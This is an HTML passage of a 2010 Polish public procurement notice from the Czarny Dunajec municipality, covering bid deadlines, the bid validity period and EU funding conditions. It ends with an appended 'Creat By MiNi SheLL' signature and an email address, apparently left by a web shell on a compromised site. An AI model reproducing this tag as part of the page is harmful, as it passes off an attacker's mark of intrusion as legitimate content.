<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2010 godzina 11:00, miejsce: Urząd Gminy Czarny Dunajec, 34-470 Czarny Dunajec, ul. Józefa Piłsudskiego 2, sekretariat (II piętro)  - pokój nr 40.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com